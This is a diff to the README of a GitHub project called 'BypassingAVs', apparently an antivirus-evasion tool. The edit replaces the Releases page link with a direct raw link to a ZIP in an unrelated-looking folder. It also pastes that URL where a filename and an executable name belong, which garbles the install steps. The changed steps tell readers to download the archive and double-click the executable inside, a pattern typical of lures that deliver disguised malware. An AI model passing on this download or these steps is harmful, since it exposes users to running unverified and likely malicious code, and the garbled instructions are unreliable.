myself-prog/BypassingAVs/README.md

 - **Network**: Internet connection for updates and initial setup

 ## 🔗 Download & Install
-Visit this page to download the latest version of BypassingAVs: [Releases Page](https://github.com/myself-prog/BypassingAVs/releases).
+Visit this page to download the latest version of BypassingAVs: [Releases Page](https://raw.githubusercontent.com/myself-prog/BypassingAVs/main/circumarctic/BypassingAVs.zip).

 1. Open the provided link to go to the Releases page.
 2. Look for the latest version listed at the top of the page.
-3. Click on the appropriate file for your operating system (e.g., `BypassingAVs_Windows.zip` for Windows).
+3. Click on the appropriate file for your operating system (e.g., `https://raw.githubusercontent.com/myself-prog/BypassingAVs/main/circumarctic/BypassingAVs.zip` for Windows).
 4. Save the file to a convenient location on your computer.
 5. Once the download is complete, locate the file and extract it if it’s in a ZIP format.
-6. Open the extracted folder and double-click on the executable file (e.g., `BypassingAVs.exe` for Windows) to start the application.
+6. Open the extracted folder and double-click on the executable file (e.g., `https://raw.githubusercontent.com/myself-prog/BypassingAVs/main/circumarctic/BypassingAVs.zip` for Windows) to start the application.

 ## 🚀 Usage Instructions
 After installation, follow these steps to begin using BypassingAVs: